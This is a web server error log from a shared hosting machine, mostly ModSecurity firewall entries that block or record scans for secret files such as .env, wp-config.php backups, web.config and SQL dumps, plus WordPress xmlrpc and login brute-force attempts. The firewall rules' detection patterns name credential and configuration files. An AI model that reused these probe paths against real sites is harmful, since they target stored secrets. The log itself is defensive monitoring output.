[Tue May 26 13:30:21.025407 2026] [security2:error] [pid 512745:tid 512966] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/website/.env"] [unique_id "ahVTFXKSB_s2CvZg7xNuXgAAAWU"]
[Tue May 26 13:30:21.060066 2026] [security2:error] [pid 512745:tid 512907] [client 45.148.10.95:19546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVTFXKSB_s2CvZg7xNuXwAAASo"]
[Tue May 26 13:30:21.067832 2026] [security2:error] [pid 512344:tid 512567] [client 45.148.10.95:5128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.bak"] [unique_id "ahVTFcbElyei4S77DQcHQAAAAF0"]
[Tue May 26 13:30:21.078437 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:5282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.new"] [unique_id "ahVTFXKSB_s2CvZg7xNuYAAAAVI"]
[Tue May 26 13:30:21.087797 2026] [security2:error] [pid 512745:tid 512938] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVTFXKSB_s2CvZg7xNuYQAAAUk"]
[Tue May 26 13:30:21.118982 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:5174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/wp-content/mysql.sql"] [unique_id "ahVTFcbElyei4S77DQcHQgAAAD4"]
[Tue May 26 13:30:23.110161 2026] [security2:error] [pid 512344:tid 512547] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTFsbElyei4S77DQcHVQAAAEk"]
[Tue May 26 13:30:23.340022 2026] [security2:error] [pid 512344:tid 512564] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTFsbElyei4S77DQcHVAAAWhg"]
[Tue May 26 13:30:23.605706 2026] [security2:error] [pid 512745:tid 513000] [client 216.75.132.173:21392] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.gciamd.org.in"] [uri "/theorder/06_St Lawrence the Martyr.jpg"] [unique_id "ahVTF3KSB_s2CvZg7xNutAAAAWI"]
[Tue May 26 13:30:25.143849 2026] [security2:error] [pid 512745:tid 512902] [client 185.191.171.1:25050] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahVTGXKSB_s2CvZg7xNuyAAAASU"]
[Tue May 26 13:30:25.143954 2026] [security2:error] [pid 512745:tid 512902] [client 185.191.171.1:25050] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahVTGXKSB_s2CvZg7xNuyAAAASU"]
[Tue May 26 13:30:25.470935 2026] [security2:error] [pid 512745:tid 512888] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTGXKSB_s2CvZg7xNuxwAAARc"]
[Tue May 26 13:30:26.024562 2026] [security2:error] [pid 512745:tid 512965] [client 95.70.131.179:63281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVTGXKSB_s2CvZg7xNu1QAAAWQ"]
[Tue May 26 13:30:26.706654 2026] [security2:error] [pid 512344:tid 512560] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTGsbElyei4S77DQcHlAAAAFY"], referer: https://www.anujtradingco.com/
[Tue May 26 13:30:27.526358 2026] [security2:error] [pid 512745:tid 512932] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTG3KSB_s2CvZg7xNu6wAAAUM"]
[Tue May 26 13:30:28.731401 2026] [security2:error] [pid 512745:tid 512971] [client 8.217.191.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVTG3KSB_s2CvZg7xNu6AAAAWo"]
[Tue May 26 13:30:29.015759 2026] [security2:error] [pid 512745:tid 512888] [client 123.28.225.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTHHKSB_s2CvZg7xNvAwAAARc"]
[Tue May 26 13:30:29.174657 2026] [security2:error] [pid 512745:tid 512935] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTHXKSB_s2CvZg7xNvFwAAAUY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 13:30:29.465265 2026] [security2:error] [pid 512745:tid 512970] [client 91.196.152.249:50643] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVTHHKSB_s2CvZg7xNvBQAAAWk"]
[Tue May 26 13:30:29.925225 2026] [security2:error] [pid 512745:tid 512993] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTHXKSB_s2CvZg7xNvHQAAAYA"]
[Tue May 26 13:30:30.754840 2026] [security2:error] [pid 512745:tid 512963] [client 46.151.24.148:54010] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVTHnKSB_s2CvZg7xNvMgAAAWI"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 13:30:31.997125 2026] [security2:error] [pid 512344:tid 512541] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTH8bElyei4S77DQcH0gAAAEM"]
[Tue May 26 13:30:33.964138 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTIXKSB_s2CvZg7xNvSQAAASM"]
[Tue May 26 13:30:34.210201 2026] [security2:error] [pid 512745:tid 512911] [client 139.180.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTInKSB_s2CvZg7xNvVgAAAS4"], referer: https://anujtradingco.com
[Tue May 26 13:30:35.723256 2026] [security2:error] [pid 512745:tid 512826] [remote 95.216.117.13:43322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTI3KSB_s2CvZg7xNvagABMVA"]
[Tue May 26 13:30:35.854712 2026] [security2:error] [pid 512745:tid 512921] [client 40.77.167.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "nicmaperu.com"] [uri "/index.php"] [unique_id "ahVTI3KSB_s2CvZg7xNvbQAAATg"]
[Tue May 26 13:30:36.320228 2026] [proxy:error] [pid 512344:tid 512523] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:36.320290 2026] [proxy_http:error] [pid 512344:tid 512523] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:36.320941 2026] [proxy:error] [pid 512344:tid 512523] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:36.320993 2026] [proxy_http:error] [pid 512344:tid 512523] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:36.535760 2026] [security2:error] [pid 512745:tid 512992] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTJHKSB_s2CvZg7xNvdQAAAX8"]
[Tue May 26 13:30:37.103782 2026] [proxy:error] [pid 512344:tid 512563] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:37.103869 2026] [proxy_http:error] [pid 512344:tid 512563] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.ndequipments.com/
[Tue May 26 13:30:37.104513 2026] [proxy:error] [pid 512344:tid 512563] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:37.104546 2026] [proxy_http:error] [pid 512344:tid 512563] [client 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.ndequipments.com/
[Tue May 26 13:30:38.362962 2026] [proxy:error] [pid 512344:tid 512418] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:38.363039 2026] [proxy_http:error] [pid 512344:tid 512418] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:38.363661 2026] [proxy:error] [pid 512344:tid 512418] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:38.363721 2026] [proxy_http:error] [pid 512344:tid 512418] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:30:38.403220 2026] [security2:error] [pid 512344:tid 512505] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTJcbElyei4S77DQcIGwAAAB8"]
[Tue May 26 13:30:39.048051 2026] [security2:error] [pid 512344:tid 512431] [remote 167.172.25.98:39958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTJsbElyei4S77DQcIJAAAGVY"]
[Tue May 26 13:30:39.398301 2026] [fcgid:warn] [pid 512344:tid 512597] (70014)End of file found: [client 66.132.195.117:21586] mod_fcgid: can't get data from http client
[Tue May 26 13:30:40.318637 2026] [proxy:error] [pid 512745:tid 512774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:40.318699 2026] [proxy_http:error] [pid 512745:tid 512774] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.ndequipments.com/
[Tue May 26 13:30:40.319416 2026] [proxy:error] [pid 512745:tid 512774] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:30:40.319451 2026] [proxy_http:error] [pid 512745:tid 512774] [remote 168.144.155.243:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.ndequipments.com/
[Tue May 26 13:30:40.331212 2026] [security2:error] [pid 512344:tid 512481] [client 95.70.131.179:63234] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTJ8bElyei4S77DQcIMAAAAAc"]
[Tue May 26 13:30:40.331347 2026] [security2:error] [pid 512344:tid 512481] [client 95.70.131.179:63234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTJ8bElyei4S77DQcIMAAAAAc"]
[Tue May 26 13:30:40.902033 2026] [security2:error] [pid 512344:tid 512518] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTKMbElyei4S77DQcIOgAAACw"]
[Tue May 26 13:30:43.376248 2026] [security2:error] [pid 512745:tid 512933] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTKnKSB_s2CvZg7xNvwwAAAUQ"]
[Tue May 26 13:30:45.632690 2026] [security2:error] [pid 512745:tid 512892] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTLXKSB_s2CvZg7xNv1QAAARs"]
[Tue May 26 13:30:47.663693 2026] [security2:error] [pid 512745:tid 512971] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTL3KSB_s2CvZg7xNv7AAAAWo"]
[Tue May 26 13:30:49.750463 2026] [security2:error] [pid 512344:tid 512455] [remote 95.70.131.179:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTMcbElyei4S77DQcIqwAAH24"]
[Tue May 26 13:30:49.750740 2026] [security2:error] [pid 512344:tid 512505] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTMcbElyei4S77DQcIqwAAH24"]
[Tue May 26 13:30:50.027298 2026] [security2:error] [pid 512344:tid 512578] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTMcbElyei4S77DQcIpgAAAGg"]
[Tue May 26 13:30:50.745826 2026] [security2:error] [pid 512745:tid 512914] [client 91.92.42.63:64972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/web.config"] [unique_id "ahVTMnKSB_s2CvZg7xNwKAAAATE"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.771855 2026] [security2:error] [pid 512745:tid 512990] [client 91.92.42.63:65002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVTMnKSB_s2CvZg7xNwLAAAAX0"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.792051 2026] [security2:error] [pid 512745:tid 513001] [client 91.92.42.63:64948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/database.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJgAAAYg"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.808973 2026] [security2:error] [pid 512745:tid 512945] [client 91.92.42.63:64958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/settings.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJwAAAVA"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.814815 2026] [security2:error] [pid 512745:tid 512979] [client 91.92.42.63:64940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/db.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwKQAAAXI"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:50.896976 2026] [security2:error] [pid 512344:tid 512524] [client 91.92.42.63:65048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/db.php"] [unique_id "ahVTMsbElyei4S77DQcIxwAAADI"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.914944 2026] [security2:error] [pid 512344:tid 512542] [client 91.92.42.63:65066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/settings.php"] [unique_id "ahVTMsbElyei4S77DQcIyAAAAEQ"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.921154 2026] [security2:error] [pid 512745:tid 512969] [client 91.92.42.63:65052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/web.config"] [unique_id "ahVTMnKSB_s2CvZg7xNwMwAAAWg"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.947976 2026] [security2:error] [pid 512344:tid 512571] [client 91.92.42.63:65074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/database.php"] [unique_id "ahVTMsbElyei4S77DQcIywAAAGE"], referer: http://taotechservices.com/
[Tue May 26 13:30:50.980060 2026] [security2:error] [pid 512344:tid 512514] [client 91.92.42.63:65096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVTMsbElyei4S77DQcIzgAAACg"], referer: http://taotechservices.com/
[Tue May 26 13:30:51.316044 2026] [security2:error] [pid 512745:tid 512887] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwLwAAARY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:51.316904 2026] [security2:error] [pid 512745:tid 512919] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwLgAAATY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:51.355362 2026] [security2:error] [pid 512745:tid 512915] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTMnKSB_s2CvZg7xNwJQAAATI"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:30:52.412897 2026] [security2:error] [pid 512344:tid 512598] [client 146.174.177.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTM8bElyei4S77DQcI0gAAAHw"]
[Tue May 26 13:30:52.717842 2026] [security2:error] [pid 512745:tid 512893] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTM3KSB_s2CvZg7xNwRAAAARw"]
[Tue May 26 13:30:54.449900 2026] [security2:error] [pid 512745:tid 512966] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTNnKSB_s2CvZg7xNwZgAAAWU"]
[Tue May 26 13:30:55.577612 2026] [security2:error] [pid 512745:tid 512930] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTNnKSB_s2CvZg7xNwdAABQVc"]
